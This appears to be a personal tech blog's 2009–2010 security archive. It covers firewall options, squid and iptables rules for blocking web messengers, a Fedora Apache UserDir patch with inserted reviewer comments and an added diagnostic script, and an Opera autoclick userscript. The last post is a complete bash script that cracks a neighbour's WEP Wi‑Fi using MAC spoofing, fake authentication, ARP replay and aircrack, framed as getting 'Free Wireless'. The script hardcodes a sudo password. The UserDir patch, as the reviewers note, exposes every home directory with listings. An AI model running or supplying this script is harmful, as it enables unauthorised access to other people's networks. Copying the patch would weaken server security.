Archive for the ‘security’ Category

Firewalls

March 1st, 2010

smoothwall
ipcop
untangle
endian
m0n0wall
vyatta
pfsense

Another option: install any Linux flavor + squid + iptables.

A good option for Windows users: http://personalfirewall.comodo.com/

Block Messenger (squid + iptables)

March 1st, 2010

In Mexico I installed a firewall and squid on a server; the important options are:

squid.conf:

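# Web-messenger domains, one per line in blocked.domains
acl no_permitido dstdomain "/etc/squid/blocked.domains"
# MSN Messenger tunnelled over HTTP: its request MIME type and gateway URL
acl msn_mime req_mime_type -i ^application/x-msn-messenger$
acl msn_gw url_regex -i gateway.dll
# The deny rules must come before any http_access allow rule (first match wins)
http_access deny no_permitido
http_access deny all msn_mime
http_access deny all msn_gw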

blocked.domains:

.ebuddy.com
.messengerfx.com
.iloveim.com
.meebo.com
...

iptables:

iptables -I FORWARD -p tcp --dport 1863 -j REJECT

Fedora 12 + Httpd + Userdir + SElinux Works

January 30th, 2010

First install a LAMP stack (see the guide on HowtoForge).

Replace $USER with your username.

mkdir /home/$USER/public_html
firefox http://localhost/~$USER/

If you only see Forbidden (403), don’t worry, do this:

I made a patch file (if you have made custom changes to httpd.conf, don’t use this file; make the changes manually).

Install patch on your system and patch httpd.conf:

yum install patch

my patch file:

--- httpd-patch.conf	2010-01-30 14:59:51.811850034 -0800
+++ httpd.conf	2010-01-30 14:25:04.527864263 -0800
@@ -349,14 +349,15 @@
     # of a username on the system (depending on home directory
     # permissions).
     #
-    UserDir disabled
+    #UserDir disabled
+    UserDir enabled $USER
 
     #
     # To enable requests to /~user/ to serve the user's public_html
     # directory, remove the "UserDir disabled" line above, and uncomment
     # the following line instead:
     # 
-    #UserDir public_html
+    UserDir public_html
 
 </IfModule>
 
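Review bot: commenting out `UserDir disabled` while adding `UserDir enabled $USER` and `UserDir public_html` turns on /~user/ for every account, not only the one named, because the `enabled` list only has an effect when a global `UserDir disabled` is also in force. Keep the `UserDir disabled` line and add `UserDir enabled <username>` below it. Also, `$USER` is not expanded by Apache, so it has to be replaced with the real username before the patch is applied.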
@@ -364,18 +365,18 @@
 # Control access to UserDir directories.  The following is an example
 # for a site where these directories are restricted to read-only.
 #
-#<Directory /home/*/public_html>
-#    AllowOverride FileInfo AuthConfig Limit
-#    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
-#    <Limit GET POST OPTIONS>
-#        Order allow,deny
-#        Allow from all
-#    </Limit>
-#    <LimitExcept GET POST OPTIONS>
-#        Order deny,allow
-#        Deny from all
-#    </LimitExcept>
-#</Directory>
+<Directory /home/*/public_html>
+    AllowOverride FileInfo AuthConfig Limit
+    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
+    <Limit GET POST OPTIONS>
+        Order allow,deny
+        Allow from all
+    </Limit>
+    <LimitExcept GET POST OPTIONS>
+        Order deny,allow
+        Deny from all
+    </LimitExcept>
+</Directory>
 
 #
 # DirectoryIndex: sets the file that Apache will serve if a directory
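Review bot: the uncommented `Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec` line keeps `Indexes`, so any public_html without an index file is listed in full to whoever requests it, and `<Directory /home/*/public_html>` applies that to every home directory. Drop `Indexes` unless listing is wanted, and consider narrowing `AllowOverride FileInfo AuthConfig Limit` if users should not be able to change these settings through .htaccess.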

Next, run:

patch /etc/httpd/conf/httpd.conf < patch1.txt
chmod 711 /home/$USER
chmod 755 /home/$USER/public_html
chcon -R -t httpd_sys_content_t /home/$USER/public_html
setsebool -P httpd_enable_homedirs 1
service httpd restart

now:

firefox http://localhost/~$USER/

Done.
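If the page still returns 403 after these steps, the following check walks through the same permission and SELinux settings and reports which one is off. It is an added example, not part of the original post; the function name `check_userdir` and the `SKIP_SELINUX` switch are assumptions made for illustration.

```bash
#!/bin/bash
# Added example: report why Apache may still answer 403 for /~user/.
# Usage: ./check_userdir.sh /home/alice   (script name is hypothetical)
# SKIP_SELINUX=1 (hypothetical switch) skips the SELinux checks.

check_userdir() {
    local home=$1 pub=$1/public_html problems=0 m setype
    if [ ! -d "$pub" ]; then
        echo "FAIL $pub does not exist"
        return 1
    fi
    # httpd runs as a different user, so the "other" permission bits decide.
    m=$(stat -c %a "$home")
    if [ $(( 0$m & 01 )) -eq 0 ]; then
        echo "FAIL $home is mode $m: others cannot traverse it (chmod 711)"
        problems=$((problems + 1))
    fi
    m=$(stat -c %a "$pub")
    if [ $(( 0$m & 05 )) -ne 5 ]; then
        echo "FAIL $pub is mode $m: others need r-x (chmod 755)"
        problems=$((problems + 1))
    fi
    # SELinux checks only where the tools exist and SELinux is not disabled.
    if [ -z "$SKIP_SELINUX" ] && command -v getenforce >/dev/null 2>&1 \
        && [ "$(getenforce)" != "Disabled" ]; then
        setype=$(stat -c %C "$pub" | cut -d: -f3)
        case $setype in
            httpd_sys_content_t|httpd_user_content_t) ;;
            *)  echo "FAIL $pub has SELinux type $setype (chcon -R -t httpd_sys_content_t)"
                problems=$((problems + 1)) ;;
        esac
        if ! getsebool httpd_enable_homedirs | grep -q -- '--> on$'; then
            echo "FAIL httpd_enable_homedirs is off (setsebool -P httpd_enable_homedirs 1)"
            problems=$((problems + 1))
        fi
    fi
    [ "$problems" -eq 0 ] && echo "OK $home passes all checks that were run"
    return "$problems"
}

if [ $# -gt 0 ]; then
    check_userdir "$1"
fi
```

The return value is the number of failed checks, so it can be used directly in a provisioning script.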

Categories: security, unix/linux, web

Autoclick Opera Userscript

October 15th, 2009

Autoclick code:

// Click element e programmatically, falling back through older event APIs.
function autoclick(e) {
	if (e && typeof e == 'object') {
		if (typeof e.click != 'undefined') {
			// Native click() is available
			e.click();
			return false;
		} else if (document.createEvent) {
			// DOM Level 2: build and dispatch a synthetic click event
			var evObj = document.createEvent('MouseEvents');
			evObj.initEvent('click', true, true);
			e.dispatchEvent(evObj);
			return false;
		} else if (document.createEventObject) {
			// Legacy IE event model
			e.fireEvent('onclick');
			return false;
		}
	}
}

Categories: security, web

Wireless Hack Bash Script

August 23rd, 2009

#!/bin/bash
#
# WARNING: USE AT YOUR OWN RISK!
#
# SIDE EFFECTS: UNHAPPY NEIGHBORS
# 
# Author: ALbertux (Alberto Isaac Ayala Esquivias)
# Mail: <Albertux@AyalaSoft.com>
# Web: http://Albertux.AyalaSoft.com
# Script: Wireless Hack
# Tested on: Ubuntu 9.04
 
# A little trouble using gksudo gnome-terminal
# https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575
# gnome-terminal -e "sudo ...." # could be ...
# TERM=gnome-terminal
TERM=xterm
 
# A nasty function to run_like_a_root user sending the passwd
function run_like_a_root() {
sudo -S $@ << EOF
your_password
EOF
}
 
# Restore to normal: ./this_script.sh restore
if [ "$1" == "restore" ]; then
	run_like_a_root "airmon-ng stop mon0"
	run_like_a_root "/etc/init.d/networking restart"
	run_like_a_root "NetworkManager"
	exit 1
fi
 
# Set Wireless Device: ./this_script.sh wlan1
if [ -z $1 ]; then
	WDEVICE=wlan0 # Could be different on your notebook
else
	WDEVICE=$1 # Set Wireless Device
fi
 
# Stop Wireless
run_like_a_root airmon-ng stop $WDEVICE
 
# Kill all fu**ing process using the Wireless Device:
run_like_a_root kill -9 `run_like_a_root airmon-ng start $WDEVICE | grep ^[1-9] | awk ' { print $1 } '`
 
# Wireless Devices Down (we need to change the Mac)
run_like_a_root ifconfig $WDEVICE down
run_like_a_root ifconfig mon0 down
 
# Fake Mac, Example:
FAKEMAC=00:66:00:66:00:66
 
# Set Fake Mac
run_like_a_root macchanger -m $FAKEMAC $WDEVICE
run_like_a_root macchanger -m $FAKEMAC mon0
 
# Up the Wireless Interface
run_like_a_root ifconfig mon0 up
 
# See all available networks
run_like_a_root $TERM -e "airodump-ng mon0" &
 
# Watch the xterm loaded and write the values (maybe you need resize xterm window)
clear
echo "Network Name: "
read ESSID
echo "Network Mac: "
read BSSID
echo "Network Channel: "
read CHANNEL
echo "Close the airodump-ng xterm and press [enter]"
read
 
# Get Data (IVs)
run_like_a_root $TERM -e "airodump-ng mon0 -w data -c $CHANNEL --bssid $BSSID" &
 
# Fake Authentication Attack
run_like_a_root $TERM -e "watch aireplay-ng -1 0 -e $ESSID -a $BSSID -h $FAKEMAC mon0" &
 
# ARP Request
run_like_a_root $TERM -e "aireplay-ng -3 -b $BSSID -h $FAKEMAC mon0" &
 
# Wait some time ...
echo "Press any key to launch aircrack-ng (30,000+ on data recommended)"
read
 
# Crack the Passwd
run_like_a_root $TERM -e "aircrack-ng data-*.cap" &
 
exit 0

Free Wireless on Ubuntu 9.04
